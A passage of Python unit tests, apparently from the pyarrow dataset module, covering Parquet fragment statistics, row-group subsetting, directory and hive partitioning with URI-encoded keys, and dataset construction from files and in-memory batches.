'date32',
'date64',
'time32',
'time64',
]
)
path = str(tempdir / "test_parquet_dataset_all_types")
# write_to_dataset currently requires pandas
pq.write_to_dataset(table, path, use_legacy_dataset=True,
chunk_size=chunk_size)
return table, ds.dataset(path, format="parquet", partitioning="hive")
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_parquet_fragment_statistics(tempdir):
table, dataset = _create_dataset_all_types(tempdir)
fragment = list(dataset.get_fragments())[0]
import datetime
def dt_s(x): return datetime.datetime(1970, 1, 1, 0, 0, x)
def dt_ms(x): return datetime.datetime(1970, 1, 1, 0, 0, 0, x*1000)
def dt_us(x): return datetime.datetime(1970, 1, 1, 0, 0, 0, x)
date = datetime.date
time = datetime.time
# list and scan row group fragments
row_group_fragments = list(fragment.split_by_row_group())
assert row_group_fragments[0].row_groups is not None
row_group = row_group_fragments[0].row_groups[0]
assert row_group.num_rows == 3
assert row_group.total_byte_size > 1000
assert row_group.statistics == {
'boolean': {'min': False, 'max': True},
'int8': {'min': 1, 'max': 42},
'uint8': {'min': 1, 'max': 42},
'int16': {'min': 1, 'max': 42},
'uint16': {'min': 1, 'max': 42},
'int32': {'min': 1, 'max': 42},
'uint32': {'min': 1, 'max': 42},
'int64': {'min': 1, 'max': 42},
'uint64': {'min': 1, 'max': 42},
'float': {'min': 1.0, 'max': 42.0},
'double': {'min': 1.0, 'max': 42.0},
'utf8': {'min': 'a', 'max': 'z'},
'binary': {'min': b'a', 'max': b'z'},
'ts[s]': {'min': dt_s(1), 'max': dt_s(42)},
'ts[ms]': {'min': dt_ms(1), 'max': dt_ms(42)},
'ts[us]': {'min': dt_us(1), 'max': dt_us(42)},
'date32': {'min': date(1970, 1, 2), 'max': date(1970, 2, 12)},
'date64': {'min': date(1970, 1, 1), 'max': date(1970, 2, 18)},
'time32': {'min': time(0, 0, 1), 'max': time(0, 0, 42)},
'time64': {'min': time(0, 0, 0, 1), 'max': time(0, 0, 0, 42)},
}
@pytest.mark.parquet
def test_parquet_fragment_statistics_nulls(tempdir):
table = pa.table({'a': [0, 1, None, None], 'b': ['a', 'b', None, None]})
pq.write_table(table, tempdir / "test.parquet", row_group_size=2)
dataset = ds.dataset(tempdir / "test.parquet", format="parquet")
fragments = list(dataset.get_fragments())[0].split_by_row_group()
# second row group has all nulls -> no statistics
assert fragments[1].row_groups[0].statistics == {}
@pytest.mark.pandas
@pytest.mark.parquet
def test_parquet_empty_row_group_statistics(tempdir):
df = pd.DataFrame({"a": ["a", "b", "b"], "b": [4, 5, 6]})[:0]
df.to_parquet(tempdir / "test.parquet", engine="pyarrow")
dataset = ds.dataset(tempdir / "test.parquet", format="parquet")
fragments = list(dataset.get_fragments())[0].split_by_row_group()
# Only row group is empty
assert fragments[0].row_groups[0].statistics == {}
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_parquet_row_groups_predicate(tempdir):
table, dataset = _create_dataset_for_fragments(tempdir, chunk_size=2)
fragment = list(dataset.get_fragments())[0]
assert fragment.partition_expression.equals(ds.field('part') == 'a')
# predicate may reference a partition field not present in the
# physical_schema if an explicit schema is provided to split_by_row_group
# filter matches partition_expression: all row groups
row_group_fragments = list(
fragment.split_by_row_group(filter=ds.field('part') == 'a',
schema=dataset.schema))
assert len(row_group_fragments) == 2
# filter contradicts partition_expression: no row groups
row_group_fragments = list(
fragment.split_by_row_group(filter=ds.field('part') == 'b',
schema=dataset.schema))
assert len(row_group_fragments) == 0
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_parquet_row_groups_reconstruct(tempdir, dataset_reader):
table, dataset = _create_dataset_for_fragments(tempdir, chunk_size=2)
fragment = list(dataset.get_fragments())[0]
parquet_format = fragment.format
row_group_fragments = list(fragment.split_by_row_group())
# test pickle roundtrip
pickled_fragment = pickle.loads(pickle.dumps(fragment))
assert dataset_reader.to_table(
pickled_fragment) == dataset_reader.to_table(fragment)
# manually re-construct row group fragments
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression,
row_groups=[0])
result = dataset_reader.to_table(new_fragment)
assert result.equals(dataset_reader.to_table(row_group_fragments[0]))
# manually re-construct a row group fragment with filter/column projection
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression,
row_groups={1})
result = dataset_reader.to_table(
new_fragment, schema=table.schema, columns=['f1', 'part'],
filter=ds.field('f1') < 3, )
assert result.column_names == ['f1', 'part']
assert len(result) == 1
# out of bounds row group index
new_fragment = parquet_format.make_fragment(
fragment.path, fragment.filesystem,
partition_expression=fragment.partition_expression,
row_groups={2})
with pytest.raises(IndexError, match="references row group 2"):
dataset_reader.to_table(new_fragment)
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_parquet_subset_ids(tempdir, open_logging_fs,
dataset_reader):
fs, assert_opens = open_logging_fs
table, dataset = _create_dataset_for_fragments(tempdir, chunk_size=1,
filesystem=fs)
fragment = list(dataset.get_fragments())[0]
# select with row group ids
subfrag = fragment.subset(row_group_ids=[0, 3])
with assert_opens([]):
assert subfrag.num_row_groups == 2
assert subfrag.row_groups == [0, 3]
assert subfrag.row_groups[0].statistics is not None
# check correct scan result of subset
result = dataset_reader.to_table(subfrag)
assert result.to_pydict() == {"f1": [0, 3], "f2": [1, 1]}
# empty list of ids
subfrag = fragment.subset(row_group_ids=[])
assert subfrag.num_row_groups == 0
assert subfrag.row_groups == []
result = dataset_reader.to_table(subfrag, schema=dataset.schema)
assert result.num_rows == 0
assert result.equals(table[:0])
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_parquet_subset_filter(tempdir, open_logging_fs,
dataset_reader):
fs, assert_opens = open_logging_fs
table, dataset = _create_dataset_for_fragments(tempdir, chunk_size=1,
filesystem=fs)
fragment = list(dataset.get_fragments())[0]
# select with filter
subfrag = fragment.subset(ds.field("f1") >= 1)
with assert_opens([]):
assert subfrag.num_row_groups == 3
assert len(subfrag.row_groups) == 3
assert subfrag.row_groups[0].statistics is not None
# check correct scan result of subset
result = dataset_reader.to_table(subfrag)
assert result.to_pydict() == {"f1": [1, 2, 3], "f2": [1, 1, 1]}
# filter that results in empty selection
subfrag = fragment.subset(ds.field("f1") > 5)
assert subfrag.num_row_groups == 0
assert subfrag.row_groups == []
result = dataset_reader.to_table(subfrag, schema=dataset.schema)
assert result.num_rows == 0
assert result.equals(table[:0])
# passing schema to ensure filter on partition expression works
subfrag = fragment.subset(ds.field("part") == "a", schema=dataset.schema)
assert subfrag.num_row_groups == 4
@pytest.mark.pandas
@pytest.mark.parquet
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_fragments_parquet_subset_invalid(tempdir):
_, dataset = _create_dataset_for_fragments(tempdir, chunk_size=1)
fragment = list(dataset.get_fragments())[0]
# passing none or both of filter / row_group_ids
with pytest.raises(ValueError):
fragment.subset(ds.field("f1") >= 1, row_group_ids=[1, 2])
with pytest.raises(ValueError):
fragment.subset()
@pytest.mark.pandas
@pytest.mark.parquet
def test_fragments_repr(tempdir, dataset):
# partitioned parquet dataset
fragment = list(dataset.get_fragments())[0]
assert (
repr(fragment) ==
"<pyarrow.dataset.ParquetFileFragment path=subdir/1/xxx/file0.parquet "
"partition=[key=xxx, group=1]>"
)
# single-file parquet dataset (no partition information in repr)
table, path = _create_single_file(tempdir)
dataset = ds.dataset(path, format="parquet")
fragment = list(dataset.get_fragments())[0]
assert (
repr(fragment) ==
"<pyarrow.dataset.ParquetFileFragment path={}>".format(
dataset.filesystem.normalize_path(str(path)))
)
# non-parquet format
path = tempdir / "data.feather"
pa.feather.write_feather(table, path)
dataset = ds.dataset(path, format="feather")
fragment = list(dataset.get_fragments())[0]
assert (
repr(fragment) ==
"<pyarrow.dataset.FileFragment type=ipc path={}>".format(
dataset.filesystem.normalize_path(str(path)))
)
@pytest.mark.parquet
def test_partitioning_factory(mockfs):
paths_or_selector = fs.FileSelector('subdir', recursive=True)
format = ds.ParquetFileFormat()
options = ds.FileSystemFactoryOptions('subdir')
partitioning_factory = ds.DirectoryPartitioning.discover(['group', 'key'])
assert isinstance(partitioning_factory, ds.PartitioningFactory)
options.partitioning_factory = partitioning_factory
factory = ds.FileSystemDatasetFactory(
mockfs, paths_or_selector, format, options
)
inspected_schema = factory.inspect()
# i64/f64 from data, group/key from "/1/xxx" and "/2/yyy" paths
expected_schema = pa.schema([
("i64", pa.int64()),
("f64", pa.float64()),
("str", pa.string()),
("const", pa.int64()),
("struct", pa.struct({'a': pa.int64(), 'b': pa.string()})),
("group", pa.int32()),
("key", pa.string()),
])
assert inspected_schema.equals(expected_schema)
hive_partitioning_factory = ds.HivePartitioning.discover()
assert isinstance(hive_partitioning_factory, ds.PartitioningFactory)
@pytest.mark.parquet
@pytest.mark.parametrize('infer_dictionary', [False, True])
def test_partitioning_factory_dictionary(mockfs, infer_dictionary):
paths_or_selector = fs.FileSelector('subdir', recursive=True)
format = ds.ParquetFileFormat()
options = ds.FileSystemFactoryOptions('subdir')
options.partitioning_factory = ds.DirectoryPartitioning.discover(
['group', 'key'], infer_dictionary=infer_dictionary)
factory = ds.FileSystemDatasetFactory(
mockfs, paths_or_selector, format, options)
inferred_schema = factory.inspect()
if infer_dictionary:
expected_type = pa.dictionary(pa.int32(), pa.string())
assert inferred_schema.field('key').type == expected_type
table = factory.finish().to_table().combine_chunks()
actual = table.column('key').chunk(0)
expected = pa.array(['xxx'] * 5 + ['yyy'] * 5).dictionary_encode()
assert actual.equals(expected)
# ARROW-9345 ensure filtering on the partition field works
table = factory.finish().to_table(filter=ds.field('key') == 'xxx')
actual = table.column('key').chunk(0)
expected = expected.slice(0, 5)
assert actual.equals(expected)
else:
assert inferred_schema.field('key').type == pa.string()
def test_partitioning_factory_segment_encoding():
mockfs = fs._MockFileSystem()
format = ds.IpcFileFormat()
schema = pa.schema([("i64", pa.int64())])
table = pa.table([pa.array(range(10))], schema=schema)
partition_schema = pa.schema(
[("date", pa.timestamp("s")), ("string", pa.string())])
string_partition_schema = pa.schema(
[("date", pa.string()), ("string", pa.string())])
full_schema = pa.schema(list(schema) + list(partition_schema))
for directory in [
"directory/2021-05-04 00%3A00%3A00/%24",
"hive/date=2021-05-04 00%3A00%3A00/string=%24",
]:
mockfs.create_dir(directory)
with mockfs.open_output_stream(directory + "/0.feather") as sink:
with pa.ipc.new_file(sink, schema) as writer:
writer.write_table(table)
writer.close()
# Directory
selector = fs.FileSelector("directory", recursive=True)
options = ds.FileSystemFactoryOptions("directory")
options.partitioning_factory = ds.DirectoryPartitioning.discover(
schema=partition_schema)
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
inferred_schema = factory.inspect()
assert inferred_schema == full_schema
actual = factory.finish().to_table(columns={
"date_int": ds.field("date").cast(pa.int64()),
})
assert actual[0][0].as_py() == 1620086400
options.partitioning_factory = ds.DirectoryPartitioning.discover(
["date", "string"], segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("date") == "2021-05-04 00%3A00%3A00") &
(ds.field("string") == "%24"))
options.partitioning = ds.DirectoryPartitioning(
string_partition_schema, segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("date") == "2021-05-04 00%3A00%3A00") &
(ds.field("string") == "%24"))
options.partitioning_factory = ds.DirectoryPartitioning.discover(
schema=partition_schema, segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
with pytest.raises(pa.ArrowInvalid,
match="Could not cast segments for partition field"):
inferred_schema = factory.inspect()
# Hive
selector = fs.FileSelector("hive", recursive=True)
options = ds.FileSystemFactoryOptions("hive")
options.partitioning_factory = ds.HivePartitioning.discover(
schema=partition_schema)
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
inferred_schema = factory.inspect()
assert inferred_schema == full_schema
actual = factory.finish().to_table(columns={
"date_int": ds.field("date").cast(pa.int64()),
})
assert actual[0][0].as_py() == 1620086400
options.partitioning_factory = ds.HivePartitioning.discover(
segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("date") == "2021-05-04 00%3A00%3A00") &
(ds.field("string") == "%24"))
options.partitioning = ds.HivePartitioning(
string_partition_schema, segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("date") == "2021-05-04 00%3A00%3A00") &
(ds.field("string") == "%24"))
options.partitioning_factory = ds.HivePartitioning.discover(
schema=partition_schema, segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
with pytest.raises(pa.ArrowInvalid,
match="Could not cast segments for partition field"):
inferred_schema = factory.inspect()
def test_partitioning_factory_hive_segment_encoding_key_encoded():
mockfs = fs._MockFileSystem()
format = ds.IpcFileFormat()
schema = pa.schema([("i64", pa.int64())])
table = pa.table([pa.array(range(10))], schema=schema)
partition_schema = pa.schema(
[("test'; date", pa.timestamp("s")), ("test';[ string'", pa.string())])
string_partition_schema = pa.schema(
[("test'; date", pa.string()), ("test';[ string'", pa.string())])
full_schema = pa.schema(list(schema) + list(partition_schema))
partition_schema_en = pa.schema(
[("test%27%3B%20date", pa.timestamp("s")),
("test%27%3B%5B%20string%27", pa.string())])
string_partition_schema_en = pa.schema(
[("test%27%3B%20date", pa.string()),
("test%27%3B%5B%20string%27", pa.string())])
directory = ("hive/test%27%3B%20date=2021-05-04 00%3A00%3A00/"
"test%27%3B%5B%20string%27=%24")
mockfs.create_dir(directory)
with mockfs.open_output_stream(directory + "/0.feather") as sink:
with pa.ipc.new_file(sink, schema) as writer:
writer.write_table(table)
writer.close()
# Hive
selector = fs.FileSelector("hive", recursive=True)
options = ds.FileSystemFactoryOptions("hive")
options.partitioning_factory = ds.HivePartitioning.discover(
schema=partition_schema)
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
inferred_schema = factory.inspect()
assert inferred_schema == full_schema
actual = factory.finish().to_table(columns={
"date_int": ds.field("test'; date").cast(pa.int64()),
})
assert actual[0][0].as_py() == 1620086400
options.partitioning_factory = ds.HivePartitioning.discover(
segment_encoding="uri")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("test'; date") == "2021-05-04 00:00:00") &
(ds.field("test';[ string'") == "$"))
options.partitioning = ds.HivePartitioning(
string_partition_schema, segment_encoding="uri")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("test'; date") == "2021-05-04 00:00:00") &
(ds.field("test';[ string'") == "$"))
options.partitioning_factory = ds.HivePartitioning.discover(
segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("test%27%3B%20date") == "2021-05-04 00%3A00%3A00") &
(ds.field("test%27%3B%5B%20string%27") == "%24"))
options.partitioning = ds.HivePartitioning(
string_partition_schema_en, segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
fragments = list(factory.finish().get_fragments())
assert fragments[0].partition_expression.equals(
(ds.field("test%27%3B%20date") == "2021-05-04 00%3A00%3A00") &
(ds.field("test%27%3B%5B%20string%27") == "%24"))
options.partitioning_factory = ds.HivePartitioning.discover(
schema=partition_schema_en, segment_encoding="none")
factory = ds.FileSystemDatasetFactory(mockfs, selector, format, options)
with pytest.raises(pa.ArrowInvalid,
match="Could not cast segments for partition field"):
inferred_schema = factory.inspect()
def test_dictionary_partitioning_outer_nulls_raises(tempdir):
table = pa.table({'a': ['x', 'y', None], 'b': ['x', 'y', 'z']})
part = ds.partitioning(
pa.schema([pa.field('a', pa.string()), pa.field('b', pa.string())]))
with pytest.raises(pa.ArrowInvalid):
ds.write_dataset(table, tempdir, format='ipc', partitioning=part)
def test_positional_keywords_raises(tempdir):
table = pa.table({'a': ['x', 'y', None], 'b': ['x', 'y', 'z']})
with pytest.raises(TypeError):
ds.write_dataset(table, tempdir, "basename-{i}.arrow")
@pytest.mark.parquet
@pytest.mark.pandas
def test_read_partition_keys_only(tempdir):
BATCH_SIZE = 2 ** 15
# This is a regression test for ARROW-15318 which saw issues
# reading only the partition keys from files with batches larger
# than the default batch size (e.g. so we need to return two chunks)
table = pa.table({
'key': pa.repeat(0, BATCH_SIZE + 1),
'value': np.arange(BATCH_SIZE + 1)})
pq.write_to_dataset(
table[:BATCH_SIZE],
tempdir / 'one', partition_cols=['key'])
pq.write_to_dataset(
table[:BATCH_SIZE + 1],
tempdir / 'two', partition_cols=['key'])
table = pq.read_table(tempdir / 'one', columns=['key'])
assert table['key'].num_chunks == 1
table = pq.read_table(tempdir / 'two', columns=['key', 'value'])
assert table['key'].num_chunks == 2
table = pq.read_table(tempdir / 'two', columns=['key'])
assert table['key'].num_chunks == 2
def _has_subdirs(basedir):
elements = os.listdir(basedir)
return any([os.path.isdir(os.path.join(basedir, el)) for el in elements])
def _do_list_all_dirs(basedir, path_so_far, result):
for f in os.listdir(basedir):
true_nested = os.path.join(basedir, f)
if os.path.isdir(true_nested):
norm_nested = posixpath.join(path_so_far, f)
if _has_subdirs(true_nested):
_do_list_all_dirs(true_nested, norm_nested, result)
else:
result.append(norm_nested)
def _list_all_dirs(basedir):
result = []
_do_list_all_dirs(basedir, '', result)
return result
def _check_dataset_directories(tempdir, expected_directories):
actual_directories = set(_list_all_dirs(tempdir))
assert actual_directories == set(expected_directories)
def test_dictionary_partitioning_inner_nulls(tempdir):
table = pa.table({'a': ['x', 'y', 'z'], 'b': ['x', 'y', None]})
part = ds.partitioning(
pa.schema([pa.field('a', pa.string()), pa.field('b', pa.string())]))
ds.write_dataset(table, tempdir, format='ipc', partitioning=part)
_check_dataset_directories(tempdir, ['x/x', 'y/y', 'z'])
def test_hive_partitioning_nulls(tempdir):
table = pa.table({'a': ['x', None, 'z'], 'b': ['x', 'y', None]})
part = ds.HivePartitioning(pa.schema(
[pa.field('a', pa.string()), pa.field('b', pa.string())]), None, 'xyz')
ds.write_dataset(table, tempdir, format='ipc', partitioning=part)
_check_dataset_directories(tempdir, ['a=x/b=x', 'a=xyz/b=y', 'a=z/b=xyz'])
def test_partitioning_function():
schema = pa.schema([("year", pa.int16()), ("month", pa.int8())])
names = ["year", "month"]
# default DirectoryPartitioning
part = ds.partitioning(schema)
assert isinstance(part, ds.DirectoryPartitioning)
part = ds.partitioning(schema, dictionaries="infer")
assert isinstance(part, ds.PartitioningFactory)
part = ds.partitioning(field_names=names)
assert isinstance(part, ds.PartitioningFactory)
# needs schema or list of names
with pytest.raises(ValueError):
ds.partitioning()
with pytest.raises(ValueError, match="Expected list"):
ds.partitioning(field_names=schema)
with pytest.raises(ValueError, match="Cannot specify both"):
ds.partitioning(schema, field_names=schema)
# Hive partitioning
part = ds.partitioning(schema, flavor="hive")
assert isinstance(part, ds.HivePartitioning)
part = ds.partitioning(schema, dictionaries="infer", flavor="hive")
assert isinstance(part, ds.PartitioningFactory)
part = ds.partitioning(flavor="hive")
assert isinstance(part, ds.PartitioningFactory)
# cannot pass list of names
with pytest.raises(ValueError):
ds.partitioning(names, flavor="hive")
with pytest.raises(ValueError, match="Cannot specify 'field_names'"):
ds.partitioning(field_names=names, flavor="hive")
# unsupported flavor
with pytest.raises(ValueError):
ds.partitioning(schema, flavor="unsupported")
@pytest.mark.parquet
def test_directory_partitioning_dictionary_key(mockfs):
# ARROW-8088 specifying partition key as dictionary type
schema = pa.schema([
pa.field('group', pa.dictionary(pa.int8(), pa.int32())),
pa.field('key', pa.dictionary(pa.int8(), pa.string()))
])
part = ds.DirectoryPartitioning.discover(schema=schema)
dataset = ds.dataset(
"subdir", format="parquet", filesystem=mockfs, partitioning=part
)
assert dataset.partitioning.schema == schema
table = dataset.to_table()
assert table.column('group').type.equals(schema.types[0])
assert table.column('group').to_pylist() == [1] * 5 + [2] * 5
assert table.column('key').type.equals(schema.types[1])
assert table.column('key').to_pylist() == ['xxx'] * 5 + ['yyy'] * 5
def test_hive_partitioning_dictionary_key(multisourcefs):
# ARROW-8088 specifying partition key as dictionary type
schema = pa.schema([
pa.field('year', pa.dictionary(pa.int8(), pa.int16())),
pa.field('month', pa.dictionary(pa.int8(), pa.int16()))
])
part = ds.HivePartitioning.discover(schema=schema)
dataset = ds.dataset(
"hive", format="parquet", filesystem=multisourcefs, partitioning=part
)
assert dataset.partitioning.schema == schema
table = dataset.to_table()
year_dictionary = list(range(2006, 2011))
month_dictionary = list(range(1, 13))
assert table.column('year').type.equals(schema.types[0])
for chunk in table.column('year').chunks:
actual = chunk.dictionary.to_pylist()
actual.sort()
assert actual == year_dictionary
assert table.column('month').type.equals(schema.types[1])
for chunk in table.column('month').chunks:
actual = chunk.dictionary.to_pylist()
actual.sort()
assert actual == month_dictionary
def _create_single_file(base_dir, table=None, row_group_size=None):
if table is None:
table = pa.table({'a': range(9), 'b': [0.] * 4 + [1.] * 5})
path = base_dir / "test.parquet"
pq.write_table(table, path, row_group_size=row_group_size)
return table, path
def _create_directory_of_files(base_dir):
table1 = pa.table({'a': range(9), 'b': [0.] * 4 + [1.] * 5})
path1 = base_dir / "test1.parquet"
pq.write_table(table1, path1)
table2 = pa.table({'a': range(9, 18), 'b': [0.] * 4 + [1.] * 5})
path2 = base_dir / "test2.parquet"
pq.write_table(table2, path2)
return (table1, table2), (path1, path2)
def _check_dataset(dataset, table, dataset_reader):
# also test that pickle roundtrip keeps the functionality
for d in [dataset, pickle.loads(pickle.dumps(dataset))]:
assert dataset.schema.equals(table.schema)
assert dataset_reader.to_table(dataset).equals(table)
def _check_dataset_from_path(path, table, dataset_reader, **kwargs):
# pathlib object
assert isinstance(path, pathlib.Path)
# accept Path, str, List[Path], List[str]
for p in [path, str(path), [path], [str(path)]]:
dataset = ds.dataset(path, **kwargs)
assert isinstance(dataset, ds.FileSystemDataset)
_check_dataset(dataset, table, dataset_reader)
# relative string path
with change_cwd(path.parent):
dataset = ds.dataset(path.name, **kwargs)
assert isinstance(dataset, ds.FileSystemDataset)
_check_dataset(dataset, table, dataset_reader)
@pytest.mark.parquet
def test_open_dataset_single_file(tempdir, dataset_reader):
table, path = _create_single_file(tempdir)
_check_dataset_from_path(path, table, dataset_reader)
@pytest.mark.parquet
def test_deterministic_row_order(tempdir, dataset_reader):
# ARROW-8447 Ensure that dataset.to_table (and Scanner::ToTable) returns a
# deterministic row ordering. This is achieved by constructing a single
# parquet file with one row per RowGroup.
table, path = _create_single_file(tempdir, row_group_size=1)
_check_dataset_from_path(path, table, dataset_reader)
@pytest.mark.parquet
def test_open_dataset_directory(tempdir, dataset_reader):
tables, _ = _create_directory_of_files(tempdir)
table = pa.concat_tables(tables)
_check_dataset_from_path(tempdir, table, dataset_reader)
@pytest.mark.parquet
def test_open_dataset_list_of_files(tempdir, dataset_reader):
tables, (path1, path2) = _create_directory_of_files(tempdir)
table = pa.concat_tables(tables)
datasets = [
ds.dataset([path1, path2]),
ds.dataset([str(path1), str(path2)])
]
datasets += [
pickle.loads(pickle.dumps(d)) for d in datasets
]
for dataset in datasets:
assert dataset.schema.equals(table.schema)
result = dataset_reader.to_table(dataset)
assert result.equals(table)
@pytest.mark.parquet
def test_open_dataset_filesystem_fspath(tempdir):
# single file
table, path = _create_single_file(tempdir)
fspath = FSProtocolClass(path)
# filesystem inferred from path
dataset1 = ds.dataset(fspath)
assert dataset1.schema.equals(table.schema)
# filesystem specified
dataset2 = ds.dataset(fspath, filesystem=fs.LocalFileSystem())
assert dataset2.schema.equals(table.schema)
# passing different filesystem
with pytest.raises(TypeError):
ds.dataset(fspath, filesystem=fs._MockFileSystem())
@pytest.mark.parquet
def test_construct_from_single_file(tempdir, dataset_reader):
directory = tempdir / 'single-file'
directory.mkdir()
table, path = _create_single_file(directory)
relative_path = path.relative_to(directory)
# instantiate from a single file
d1 = ds.dataset(path)
# instantiate from a single file with a filesystem object
d2 = ds.dataset(path, filesystem=fs.LocalFileSystem())
# instantiate from a single file with prefixed filesystem URI
d3 = ds.dataset(str(relative_path), filesystem=_filesystem_uri(directory))
# pickle roundtrip
d4 = pickle.loads(pickle.dumps(d1))
assert dataset_reader.to_table(d1) == dataset_reader.to_table(
d2) == dataset_reader.to_table(d3) == dataset_reader.to_table(d4)
@pytest.mark.parquet
def test_construct_from_single_directory(tempdir, dataset_reader):
directory = tempdir / 'single-directory'
directory.mkdir()
tables, paths = _create_directory_of_files(directory)
d1 = ds.dataset(directory)
d2 = ds.dataset(directory, filesystem=fs.LocalFileSystem())
d3 = ds.dataset(directory.name, filesystem=_filesystem_uri(tempdir))
t1 = dataset_reader.to_table(d1)
t2 = dataset_reader.to_table(d2)
t3 = dataset_reader.to_table(d3)
assert t1 == t2 == t3
# test pickle roundtrip
for d in [d1, d2, d3]:
restored = pickle.loads(pickle.dumps(d))
assert dataset_reader.to_table(restored) == t1
@pytest.mark.parquet
def test_construct_from_list_of_files(tempdir, dataset_reader):
# instantiate from a list of files
directory = tempdir / 'list-of-files'
directory.mkdir()
tables, paths = _create_directory_of_files(directory)
relative_paths = [p.relative_to(tempdir) for p in paths]
with change_cwd(tempdir):
d1 = ds.dataset(relative_paths)
t1 = dataset_reader.to_table(d1)
assert len(t1) == sum(map(len, tables))
d2 = ds.dataset(relative_paths, filesystem=_filesystem_uri(tempdir))
t2 = dataset_reader.to_table(d2)
d3 = ds.dataset(paths)
t3 = dataset_reader.to_table(d3)
d4 = ds.dataset(paths, filesystem=fs.LocalFileSystem())
t4 = dataset_reader.to_table(d4)
assert t1 == t2 == t3 == t4
@pytest.mark.parquet
def test_construct_from_list_of_mixed_paths_fails(mockfs):
# isntantiate from a list of mixed paths
files = [
'subdir/1/xxx/file0.parquet',
'subdir/1/xxx/doesnt-exist.parquet',
]
with pytest.raises(FileNotFoundError, match='doesnt-exist'):
ds.dataset(files, filesystem=mockfs)
@pytest.mark.parquet
def test_construct_from_mixed_child_datasets(mockfs):
# isntantiate from a list of mixed paths
a = ds.dataset(['subdir/1/xxx/file0.parquet',
'subdir/2/yyy/file1.parquet'], filesystem=mockfs)
b = ds.dataset('subdir', filesystem=mockfs)
dataset = ds.dataset([a, b])
assert isinstance(dataset, ds.UnionDataset)
assert len(list(dataset.get_fragments())) == 4
table = dataset.to_table()
assert len(table) == 20
assert table.num_columns == 5
assert len(dataset.children) == 2
for child in dataset.children:
assert child.files == ['subdir/1/xxx/file0.parquet',
'subdir/2/yyy/file1.parquet']
def test_construct_empty_dataset():
empty = ds.dataset([], format='ipc')
table = empty.to_table()
assert table.num_rows == 0
assert table.num_columns == 0
def test_construct_dataset_with_invalid_schema():
empty = ds.dataset([], format='ipc', schema=pa.schema([
('a', pa.int64()),
('a', pa.string())
]))
with pytest.raises(ValueError, match='Multiple matches for .*a.* in '):
empty.to_table()
def test_construct_from_invalid_sources_raise(multisourcefs):
child1 = ds.FileSystemDatasetFactory(
multisourcefs,
fs.FileSelector('/plain'),
format=ds.ParquetFileFormat()
)
child2 = ds.FileSystemDatasetFactory(
multisourcefs,
fs.FileSelector('/schema'),
format=ds.ParquetFileFormat()
)
batch1 = pa.RecordBatch.from_arrays([pa.array(range(10))], names=["a"])
batch2 = pa.RecordBatch.from_arrays([pa.array(range(10))], names=["b"])
with pytest.raises(TypeError, match='Expected.*FileSystemDatasetFactory'):
ds.dataset([child1, child2])
expected = (
"Expected a list of path-like or dataset objects, or a list "
"of batches or tables. The given list contains the following "
"types: int"
)
with pytest.raises(TypeError, match=expected):
ds.dataset([1, 2, 3])
expected = (
"Expected a path-like, list of path-likes or a list of Datasets "
"instead of the given type: NoneType"
)
with pytest.raises(TypeError, match=expected):
ds.dataset(None)
expected = (
"Expected a path-like, list of path-likes or a list of Datasets "
"instead of the given type: generator"
)
with pytest.raises(TypeError, match=expected):
ds.dataset((batch1 for _ in range(3)))
expected = (
"Must provide schema to construct in-memory dataset from an empty list"
)
with pytest.raises(ValueError, match=expected):
ds.InMemoryDataset([])
expected = (
"Item has schema\nb: int64\nwhich does not match expected schema\n"
"a: int64"
)
with pytest.raises(TypeError, match=expected):
ds.dataset([batch1, batch2])
expected = (
"Expected a list of path-like or dataset objects, or a list of "
"batches or tables. The given list contains the following types:"
)
with pytest.raises(TypeError, match=expected):
ds.dataset([batch1, 0])
expected = (
"Expected a list of tables or batches. The given list contains a int"
)
with pytest.raises(TypeError, match=expected):
ds.InMemoryDataset([batch1, 0])
def test_construct_in_memory(dataset_reader):
batch = pa.RecordBatch.from_arrays([pa.array(range(10))], names=["a"])
table = pa.Table.from_batches([batch])
dataset_table = ds.dataset([], format='ipc', schema=pa.schema([])
).to_table()
assert dataset_table == pa.table([])
for source in (batch, table, [batch], [table]):
dataset = ds.dataset(source)
assert dataset_reader.to_table(dataset) == table
assert len(list(dataset.get_fragments())) == 1
assert next(dataset.get_fragments()).to_table() == table
assert pa.Table.from_batches(list(dataset.to_batches())) == table
